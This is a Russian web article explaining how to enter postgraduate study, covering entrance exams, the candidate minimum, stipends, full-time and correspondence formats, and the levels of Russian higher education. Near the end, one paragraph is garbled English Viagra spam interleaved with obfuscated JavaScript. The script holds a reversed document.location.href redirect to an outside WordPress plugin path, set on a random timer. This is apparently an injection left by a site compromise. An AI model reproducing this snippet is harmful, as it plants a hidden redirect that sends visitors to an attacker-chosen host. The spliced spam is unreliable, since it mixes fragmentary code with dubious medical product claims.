Как поступить в аспирантуру: особенности, правила поступления и рекомендации

Ответы на вопросы

Предоставляется ли общежитие?

Обучающимся по очной форме может быть предоставлено общежитие, находящееся в распоряжении образовательного учреждения. Информацию о свободных местах и условия заселения следует уточнять непосредственно в высшем учебном заведении.

Можно ли поступить в аспирантуру без экзаменов?

При наличии конкурса поступление предполагает обязательное прохождение отбора – испытательной экзаменации. Однако возможны льготные условия. Вуз в праве установить упрощенные программы для зачисления магистрантов и перевода аспирантов из других заведений.

Освобождение от вступительных испытаний могут получить претенденты, отлично сдавшие философию и иностранный язык, а также предоставившие исследовательскую работу (реферат) по выбранной специальности. Упрощенные требования предъявляет соискательство, когда претенденты прикрепляются для подготовки диссертации к научному учреждению.

Есть ли возможность подать апелляцию по итогам испытаний?

Если, по мнению поступающего, были допущены нарушения порядка проведения или оценка не соответствует критериям оценивания (занижена), он имеет право обратиться с соответствующим заявлением в апелляционную комиссию и присутствовать при рассмотрении апелляции.

Включается ли срок обучения в трудовой стаж?

Начиная с 2013 года – нет. Это распространяется как на заочников, так и на очников.

Что делать, если осенний призыв по срокам выпадает раньше, чем зачисление в аспирантуру? Положена ли отсрочка?

На период сдачи экзаменов лицам мужского пола предоставляется отсрочка. Справка выдается мужчинам, получившим от ученого совета вуза рекомендацию.

Надо ли заверять у нотариуса копию диплома?

Нет, достаточно обычной ксерокопии.

Окончание аспирантуры с последующей защитой диссертации дает возможность получения перспективной должности и надбавок к заработной плате (в зависимости от места трудоустройства). Иначе обучение приравнивается к курсам повышения квалификации. Это следует учесть всем, кто выбрал для себя стезю научной деятельности.

Китай

Бурный рост всех сфер жизни в Китае, начиная от промышленности и заканчивая экономикой, породил нешуточный интерес к ней со стороны студентов. Аспирантура в Китае пользуется мировым спросом благодаря оптимальному соотношению стоимость/качество услуг. Чтобы поехать на учебу в Китай, ваш уровень владения китайским должен быть не ниже 4 уровня по тесту HSK. Если соискатель не проходит тест, он должен в течение года посещать языковые курсы и повторно сдать экзамен по языку. Аспирантура на английском в Китае есть, но она очень дорогая, при этом выбор специальностей невелик. Аспирант не имеет возможности выбрать научного руководителя самостоятельно. Его ему назначает вуз. Сама система обучения аналогична российской. Университеты Китая, входящие в топ-200 лучших мировых вузов:

  • Tsinghua University;
  • Fudan University;
  • Nanjing University;
  • Shanghai Jiao Tong.

Особенности получения диплома после аспирантуры

Соискатели в процессе обучения занимаются подготовкой серьезного исследовательского проекта по своей специальности. В конце требуется пройти итоговое испытание:

  • прохождение государственной аттестации в виде экзамена;
  • доклад, рассказывающий о проделанной работе в рамках исследования.

Министерство образования разрешает не защищать диссертацию учащимся в аспирантуре, если такая необходимость отсутствует. Кандидаты наук удачно выступают на защите диссертационного исследования. Если необходимо получить квалификацию исследователя, то достаточно предварительно защитить проект и сдать кандидатский минимум. В противном случае, выпускник получает лишь справку о том, что он окончил аспирантуру.

Уровни высшего профессионального образования в России

Многие абитуриенты до сих пор задаются вопросом, является ли бакалавриат высшим образованием или нет? Свидетельствует ли диплом бакалавра о том, что его обладатель получил полное высшее образование? Чтобы разрешить все сомнения, рассмотрим подробно, из чего складывается современная система высшего образования в России.

Итак, в нашей стране система высшего профессионального образования представлена сегодня тремя основными уровнями: бакалавриат, специалитет и магистратура. Особняком здесь стоит аспирантура как форма подготовки научно-педагогических кадров, то есть ученых, а также интернатура и ординатура как ступени, завершающие обучение в медицинских вузах.

Выпускники специалитета или магистратуры в области искусств, чтобы получить право на осуществление исполнительской или преподавательской деятельности, завершают свое обучение в форме ассистентуры-стажировки.

Двухступенчатая система «бакалавриат-магистратура» была установлена в 1999 году в рамках Болонского процесса с целью унификации системы образования европейских стран. Россия присоединилась к этой системе в 2003 году. Первыми российскими вузами, начавшими готовить бакалавров, стали МГИМО, РУДН, НИУ ВШЭ и некоторые другие.

Процесс внедрения двухуровневой системы в российские вузы до сих пор не завершен, во многих из них еще сохранился специалитет. Однако в перспективе специалитет планируют оставить только для ряда специальностей медицинской, военной и инженерной отраслей.

Бакалавриат

Бакалавриат – это первая ступень высшего образования в России. Диплом бакалавра подтверждает успешное окончание высшего учебного заведения и получение полного высшего профессионального образования. Мнение о том, что образование бакалавра – это неполное высшее образование, ошибочно. Обладателем неполного высшего образования считается студент, отчисленный из вуза или самостоятельно решивший прервать учебу и забрать документы.

Право поступить на программу подготовки бакалавра могут те, кто имеет среднее общее или среднее профессиональное образование. Учатся бакалавры 4 года, за это время они успевают пройти фундаментальную подготовку по выбранной специальности, изучить общепрофессиональные и специальные дисциплины, пройти практику.

Решение о выдаче выпускнику диплома с квалификацией «бакалавр» принимает Государственная экзаменационная комиссия по результатам итоговой аттестации и защиты выпускной квалификационной работы.

Специалитет

Специалитет – это форма образования, специфическая для России. Долгое время она была единственной и общепринятой. Сегодня специалистов готовят только на некоторых медицинских, инженерных и военных факультетах.

Особенность подготовки специалиста заключается в обязательном освоении общенаучной и общепрофессиональной частей программы (изучение ряда гуманитарных, социально-экономических и естественно-научных дисциплин) и теоретическая и практическая подготовка по узкой специальности. Обучают специалистов 5 лет, по окончании обучения они проходят итоговую аттестацию и защищают дипломную работу. В дипломе специалиста указывается квалификация «юрист», «экономист», «политолог» и др.

Специалисты, пожелавшие продолжить обучение, вправе сделать это в магистратуре (только на платной основе) или аспирантуре.

Магистратура

Магистратура представляет собой форму обучения по программе, построенной на основе бакалавриата, но углубленной и дополненной. Особенность магистратуры заключается в том, что магистров в течение 2 лет готовят к дальнейшей научно-исследовательской и преподавательской деятельности. Диплом о присвоении выпускнику степени магистра выдается по результатам защиты выпускной квалификационной работы магистра.

Подготовка кадров высшей квалификации

Аспирантура – это завершающий уровень высшего образования, на котором готовят научно-педагогические кадры. На учебу могут поступать магистры и специалисты. Очно учиться 3–4 года, заочно – не меньше четырех. Выпускники получают дипломы с квалификацией «Преподаватель. Преподаватель-исследователь».

Подготовка в аспирантуре состоит из четырех взаимосвязанных частей:

  • образования;
  • педагогической деятельности;
  • практики;
  • научно-исследовательской работы.

При поступлении аспиранты выбирают научное направление, представляют тему будущей диссертации. Во время учебы проводят исследование по заявленной теме, пишут кандидатскую, и если защитят ее, им присваивают степень кандидата наук.

Поступают в аспирантуру по результатам трех экзаменов: по философии, иностранному языку и профильной дисциплине, соответствующей направлению будущей учебы.

Подготовка кадров высшей квалификации по некоторым узким направлениям проходит в аспирантуре со специальными названиями:

  • ординатура – для врачей и фармацевтов; выпускники получают дипломы с конкретной квалификацией – «врач-радиолог», «врач-кардиолог», «врач-неонатолог» и т. д.;
  • адъюнктура – для военных, которые учатся в вузах Минобороны, МВД, МЧС и других «силовых» ведомств;
  • ассистентура-стажировка – для представителей творческих профессий.

В «узкоспециальных» аспирантурах учатся два года.  

Все направления подготовки в , , и перечислены в приказе Минобрнауки № 1061.

Уровни российского вузовского образования

Образование

Уровень

Базовое образование для поступления на учебу

Срок очного обучения

Квалификация после завершения учебы

Бакалавриат

I

Общее среднее (11 классов или СПО + аттестат об общем среднем образовании)

4 года

Бакалавр

Специалитет

II

Общее среднее (11 классов или СПО + аттестат об общем среднем образовании)

5 лет

Специалист с указанием конкретного направления подготовки («специалист по защите информации»; «инженер-строитель» и т. д.)

Магистратура

II

Любое высшее

2 года

Магистр

Аспирантура

III

Магистратура или специалитет

3–4 года

Исследователь, преподаватель-исследователь. После защиты диссертации степень кандидата наук

Ординатура

III

Высшее медицинское (специалитет) или фармацевтическое

2 года

Врач с указанием конкретной специализации («врач-гематолог»; «врач-нефролог» и т. д.)

Адъюнктура

III

Специалитет или магистратура 

3–4 года

Исследователь, преподаватель-исследователь. После защиты диссертации степень кандидата наук

Ассистентура-стажировка

III

Специалитет или магистратура в области искусства и культуры

2 года

Специалист высшей квалификации, преподаватель высшей школы

Что входит в образовательный процесс аспиранта?

Аспирантура представляет собой один из этапов образовательного процесса после окончания вуза. Таким образом, возможность для поступления открыта для тех, кто окончил специалитет и магистратуру. Претендентам на степень кандидата наук предстоит выполнить серьезный научный труд и защитить исследование перед комиссией. Еще один вариант реализации профессиональных навыков заключается в преподавательской деятельности и развитии научной отрасли.

Преимущества аспирантуры:

  • большой объем информации для проведения качественных и ценных исследований;
  • перед аспирантом открываются двери в профессиональный научным мир;
  • диплом кандидата наук является весомым конкурентным преимуществом при трудоустройстве;
  • наличие ученой степени позволяет заниматься преподаванием в высших учебных заведениях в должности доцента с перспективой карьерного роста;
  • отсрочка от службы в армии при условии учебы на дневном отделении.

Почему так важен научный руководитель

Научный руководитель – это, как правило,
профессор, доктор наук, которому разрешено вести аспирантов. Что он может
сделать для аспиранта:

  • ввести в круг новейших научных проблем,
    актуальной полемики;
  • обучить научному стилю (то есть, если
    по-простому, научить писать научные статьи);
  • дать подсказку в выборе темы исследования,
    правильных формулировок и т.д.;
  • обрисовать круг научных журналов, где
    может напечататься аспирант, конференций, где он может принять участие;
  • ну и, конечно, всячески мотивировать
    аспиранта на написание статей и диссертации. Аспиранты тоже люди, и ничто
    человеческое – в частности, лень – им не чуждо. А научный руководитель может
    вовремя разогнать эту лень и сподвигнуть аспиранта на тяжелый научный труд.

В
любом случае вклад научного руководителя – неоценим, а во многих случаях
является определяющим.

А
теперь представьте, что научный руководитель вами совершенно не интересуется:
вы числитесь в его аспирантах, но встречаетесь разве что на промежуточной аттестации.
Все остальное вам приходится делать самому. В каком-то смысле – изобретать
велосипед, ведь научный руководитель может вам все это объяснить, но по
каким-то причинам не делает этого. Теперь понимаете, насколько важен выбор
научного руководителя?

Правила и порядок проведения аттестации аспирантов.

На каждый экзамен приказом ректора формируется состав приемной комиссии, в которую входит председатель (чаще всего, проректор) и еще 2-3 экзаменатора (не менее 2 профильных специалистов, в том числе 1 доктор наук). На кандидатский минимум по иностранному языку приглашаются преподаватели соответствующей кафедры, независимо от их ученой степени, а также специалист по направлению исследований соискателя, хорошо знающий предмет.

Также на аттестации возможно присутствие ректора, проректора, членов Диссертационного совета, представителей Федерального агентства по образованию. По решению комиссии экзамен проводят по билетам или без них, для подготовки к ответу аспирант использует специальный экзаменационный лист, который нужно сдать для хранения экзаменаторам после сдачи. На каждого экзаменующегося составляется протокол, куда вносят вопросы по билетам и дополнительные, задаваемые соискателю. Протокол подписывают присутствующие члены комиссии, после чего документы хранят в личном деле аспиранта в отделе аспирантуры.

Если специальность будущего ученого не соответствует тому направлению, в котором готовится диссертация, потребуется сдать дополнительный экзамен по дисциплине, соответствующей теме научного труда. Правило распространяется на аспирантов заочной формы обучения.

Кандидатский минимум по специальности разрешается сдавать только в учебном заведении или организации, где есть аспирантура по профильному направлению и государственная аккредитация. Если раньше дисциплину можно было сдать только там, где планируется защищать диссертацию, то сейчас допускается выбирать разные организации для этого. При отсутствии аккредитации в ВУЗе Ученый Совет подает запрос в другое учреждение или исследовательский институт, где аспирант сможет пройти экзамены.

Для сдачи минимума по философии и истории науки обязательно наличие кафедры философии и более двух преподавателей со степенью кандидата и доктора философских наук. Если соискатель свободно владеет иностранным языком и планирует защищать диссертацию на нем, ему необходимо выбрать для прохождения аттестации учебное учреждение или организацию с аспирантурой по профильному направлению диссертационного исследования, где есть кафедра иностранного языка.

Кандидатские принято сдавать в такой последовательности:

  1. Философия и история наук сдается в первую очередь. Для подготовки будущий ученый пишет реферат, который визирует и рецензирует научный руководитель.
  2. Вторым нужно сдать иностранный язык, для чего переводят текст, имеющий отношение к тематике исследований соискателя. Работа оформляется в формате реферата и должна быть прорецензирована одним из сотрудников соответствующей кафедры.
  3. Экзамен по специальности сдают в последнюю очередь, для этого необходимо предоставить два экземпляра удостоверения о положительных оценках по первым двум дисциплинам, а также написать заявление на допуск. Копии документов отправляют в ВАК, а оригиналы подшивают к личному делу.

Уровень знаний молодого ученого в 2021 году также оценивают по четырехбальной шкале: «отлично», «хорошо», «удовлетворительно» или «неудовлетворительно», но возможна и оценка по стандартной пятибальной системе. Если по результатам экзамена соискатель получает «неудовлетворительно», он сможет пересдать этот предмет во время следующей экзаменационной сессии. Если аспирант не явился на аттестацию по уважительной причине и предоставит доказательства (например, справку о болезни), ректор может допустить его к сдаче во время текущей сессии. Но повторно сдавать кандидатский минимум, если была получена неудовлетворительная оценка, в течение одной экзаменационной сессии нельзя.

После сдачи всех экзаменов аспирант получает удостоверение об успешном прохождении аттестации. Документ имеет неограниченный срок годности, но есть несколько особенностей:

  • согласно приказу № 274 Минобрнауки России от 08.10.2007 года, результаты экзаменов, которые были получены до его вступления в силу, считаются действительными;
  • раньше вместо философии и истории наук соискатели сдавали минимум по философии, эти две дисциплины не являются взаимозаменяемыми;
  • экзамен по специальности будет признан недействительным, если после подписания приказа № 59 от 25.02.2009 года его название в Номенклатуре поменялось.

После того, как молодой ученый сдал философию и иностранный язык, он освобождается от обязательного посещения занятий по этим предметам. В то же время, минимум не нужно сдавать:

  • преподавателям, занятым на должности доцента;
  • имеющим ученую степень;
  • сотрудникам, которые готовятся к защите докторской диссертации.

Очная или заочная

Очная программа рассчитана на 3 года, предназначена для граждан до 35 лет включительно. Ее преимущества: получение отсрочки от армии (при условии поступления сразу же после вручения диплома магистра, специалиста – в год окончания) и выплата стипендии (при предоставлении справки об отсутствии официальной работы).

Отсрочка от армии действует еще в течение одного календарного года после аспирантуры – это время предоставляется для защиты кандидатской диссертации. Стипендия не выплачивается тем, кто учится на коммерческой основе (платно).

Студенты очного отделения могут заниматься преподавательской деятельностью в вузе, в котором учатся. Кроме этого, у них есть скидки, распространяющиеся на проезд, посещение театров, прочих культурно-развлекательных учреждений.

При выборе заочной формы аспиранту предстоит четырехлетний срок учебы, при этом возраст на момент подачи документов не должен превышать 40 полных лет. Заочники имеют право на дополнительный оплачиваемый отпуск.

На четвертом году они получают возможность два дня в неделю освобождаться от выполнения ими трудовых обязанностей (если они трудоустроены в государственных, а не частных или коммерческих организациях).

Вступительные экзамены

Для проведения вступительных экзаменов учебное заведение создает экзаменационные и апелляционные комиссии.

Перечень вступительных испытаний, а также язык (языки), формы их проведения, шкала оценивания и минимальное количество баллов, подтверждающее успешное прохождение вступительных испытаний, устанавливаются вузом самостоятельно. Минимальное количество баллов не может быть изменено в ходе приема.

При поступлении в аспирантуру на обучение в 2021/22 учебном году приоритетным являлось проведение вступительных испытаний с использованием дистанционных технологий.

Вступительные испытания путем непосредственного взаимодействия с поступающими допускались, если это не противоречило ограничениям в связи с санитарно-эпидемиологической обстановкой и особенностями распространения COVID-19.

Поступающий однократно сдает каждое вступительное испытание. Лица, не прошедшие вступительное испытание по уважительной причине (болезнь или иные обстоятельства, подтвержденные документально), при наличии соответствующей возможности, повторно допускаются к сдаче вступительного испытания в другой группе или в резервный день в соответствии с расписанием вступительных испытаний.

При проведении вузом вступительного испытания на различных языках поступающий выбирает один язык из предлагаемых и сдает вступительное испытание на выбранном языке.

По результатам вступительных испытаний вуз формирует и размещает на официальном сайте отдельные списки поступающих по каждому конкурсу.

Зачисление на обучение в аспирантуре проводится в соответствии с ранжированным списком до заполнения установленного количества мест.

Для зачисления на обучение на 2021/22 учебный год поступающему нужно было подать заявление о согласии на зачисление, в котором он, в частности, указывал обязательство в течение первого года обучения представить в учебное заведение оригинал документа об образовании и квалификации (при поступлении на места в рамках контрольных цифр приема, в том числе на места в пределах квот).

Зачисление на обучение завершается до дня начала учебного года. Приказ о зачислении размещается на официальном сайте вуза и должен быть доступен пользователям в течение шести месяцев со дня его издания.

Возможные формы обучения

Ознакомившись со ступенями образования в России, перейдём к возможным форматам обучения и заведениям, которые организовывают процесс образовательной подготовки.

Школа

В статье 17 Федерального закона №273 “Об образовании в РФ” говорится, что на территории страны осуществляются две формы образовательного процесса:

  • в учреждениях, реализующих образовательную деятельность;
  • вне учреждений, реализующих образовательную деятельность.

Возможные организации обязательного образования в России:

  • школа;
  • лицей;
  • гимназия.

Определение слова школа применяется для всех учреждений обязательного или дополнительного образования. К последним относятся художественные, спортивные, музыкальные школы. Учебные заведения бывают государственными, частными, со специализированным уклоном и в виде пансиона.

В России и странах СНГ лицеями называют бывшие профессионально-технические училища. В наше время лицеи осуществляют более детальную общеобразовательную программу по предметам технического или естественно-научного направления. Некоторые из них прикреплены к университетам и обеспечивают своих учеников подготовкой к поступлению в ВУЗ.

Техникум, колледж

Ступень среднего профессионального образования в России означает обучение в колледже, техникуме, училище или лицее. Рассмотрим, в чем заключается разница между первыми двумя заведениями.

В современной системе образования Российской Федерации колледж является фактически синонимом к слову “техникум”. Но, как правило, колледж предоставляет более углубленную подготовку по выбранной специальности, из-за чего длительность обучения может продлиться до 4 лет. Учеба организуется в очной, заочной и очно-заочной форме. Образовательный процесс схож с университетским, он подразумевает наличие семинаров, лекций, сессии и разделение года на семестры. Выпускники с высокой вероятностью смогут продолжить профессиональное обучение в высшем учебном заведении России.

В России в образовательной программе колледжа больше внимания уделяется теоретическому материалу, чем практическим навыкам.

Учебные планы техникумов выстроены так, что упор делается на практическую составляющую профессий. Учащихся готовят к специализации узкого профиля и рабочим специальностям. Срок обучения в техникумах составляет не более 3 лет. Пройдя данную ступень, выпускник может быстрее приступить к трудовой деятельности.

ВУЗ

Самая высокая ступень образования организуется высшими учебными заведениями. В России выделяют следующие виды:

  • федеральные университеты;
  • университеты (государственные, негосударственные и национально-исследовательские);
  • академии;
  • институты;
  • военные училища.

Университеты обладают самым высоким статусом среди всех учебных организаций. Они состоят из нескольких факультетов или институтов. Некоторые крупные университет организуют филиалы в других городах и вмещают в себя отдельные здания и корпуса.

В академии, как и в университете, ведется активная научно-исследовательская деятельность. Отличие заключается в том, что первая выбирает одну сферу обучения и делит на несколько направлений и специлизаций. Например, в России существуют академии МВД, искусств, сельского хозяйства, медицинские и т.д. Спектр изучаемых специальностей в университете намного шире.

Институт – это профильная высшая учебная организация. По возможностям институты стоят на ступени ниже других ВУЗов, поэтому зачастую они входят в состав университета, наравне с факультетами. Обучение в институтах более прикладное и узкоспециализированное.

При соблюдении требований и стандартов академии и институты преобразуются в университеты. Все три из перечисленных заведений имеют очное и заочное отделение.

Зачем еще три года учиться?

Конечно же, любой человек, который строит свое будущее с перспективой, прежде чем ответить на вопрос, как поступить в аспирантуру, должен понимать, что новые знания и ученая степень сделают его карьеру более интересной.

Если у вас есть навыки к преподавательской деятельности, то, конечно же, надо защищать ученую степень и идти дальше, чтобы знать намного больше своих учеников и студентов.

Для многих специалистов, особенно технического профиля, наличие ученой степени очень важно при карьерном продвижении. В некоторых крупных компаниях, особенно связанных с наукой, техникой, производством, трудно занять высокую руководящую должность без наличия защищенной диссертации

Именно эти моменты и являются основным мотивом для поступающих в аспирантуру.

Но не забывайте еще и о том, что всякая наука должна иметь практическое применение в нашей жизни. Так что старайтесь, чтобы тема вашей будущей диссертации была не просто интересной, но и несла пользу рядовым потребителям. Как поступить в аспирантуру? Проще простого, если есть цель и огромное желание!

Что такое аспирантура?

Система высшего образования построена таким образом, что дает преимущественно практические знания. Студенты во время обучения изучают ряд прикладных и несколько теоретических дисциплин, которые должны подготовить их к работе на производстве. Выпускники, желающие заняться теоретическими исследованиями, интересуются вопросом, как поступить в аспирантуру и так ли это необходимо для научной работы?

Аспирантура направлена на теоретическое обучение будущих ученых и преподавателей. Основное направление деятельности – подготовка новых кадров для научно-исследовательских центров, лабораторий и институтов. Отвечая на вопрос “Можно ли поступить в аспирантуру, чтобы потом заняться наукой, или стоит сначала поработать на производстве?” – не найти однозначного ответа. Каждый выпускник решает сам.

Современная аспирантура – стоит ли поступать?

Есть мнение, что современная наука дискредитировала себя, и молодежь не хочет ей заниматься. Однако ежегодные конкурсы в аспирантуру говорят об обратном. Но парадокс в том, что из поступивших успешно защищают диссертацию примерно половина. Дальнейшей же научной карьерой занимается еще меньше – примерно один из десяти выпускников аспирантуры.

Такая статистика связанна с рядом неоспоримых факторов, среди которых особенно выделяются следующие:

  • отсутствие должной мотивации;
  • желание просто протянуть время;
  • для мужчин – нежелание идти в армию;
  • отсутствие поддержки со стороны руководителя и научного сообщества;
  • низкие доходы на начальном этапе;
  • необходимость продолжать обучение, в то время как сверстники делают успешную карьеру.

Для того чтобы сделать блестящую научную карьеру, нужно приложить много усилий, потратить немало времени и даже личных средств. Так что каждый выпускник магистратуры, прежде чем отвечать на вопрос о том, как поступить в аспирантуру, должен четко понимать, для чего на самом деле он идет учиться на третью ступень.

Кто из аспирантов может претендовать на стипендию?

Размер стипендии, которая положена студентам бюджетной формы обучения, достаточно небольшой. Сумма отличается в зависимости от учебного заведения. Существует несколько условий, обязательных для исполнения получателями денежных выплат:

  • очный формат обучения;
  • высокий уровень успеваемости.

Если активно участвовать в общественной жизни образовательного учреждения, то можно претендовать на увеличенный размер стипендии. Прочие выплаты присуждают только в случае представления в деканат соответствующих документов. Как правило, денежные средства переводят на карту каждый месяц.

Распространенные варианты стипендий

Предусмотрены разные форматы выплат для аспирантов. При этом претендент на стипендию должен учиться на бюджете. Академическую стипендию присуждают за хорошую успеваемость. Если учащийся желает получать повышенное академическое пособие, то необходимо удачно завершить первый курс аспирантуры и принимать участие в студенческих мероприятиях.

Плюсы окончания аспирантуры

Let’s get a red look at some individuals which describe the action of medicine in the satisfactoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory organism, these are very good results, it makes the blood run freely for a long period of time. Who’s certainly stupid enough toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to fall for this paper-thin disguise. This process occurs not only naturally, regular usage of female Brand Viagra gradually improves circulation in the genitals.

Помимо основного назначения, подготовки и защиты диссертации кандидата наук, аспирантура дает возможность осуществлять научную деятельность и участвовать в конференциях и симпозиумах, углублять свои знания в одной узкой сфере. Кроме того, этот этап обязателен в случае, если вы планируется в перспективе защитить и докторскую диссертацию. Сделать открытие мирового масштаба, получив в дальнейшем вознаграждение и признание научного мирового сообщества, можно также в этот период.

Поделитесь в социальных сетях:FacebookX
Напишите комментарий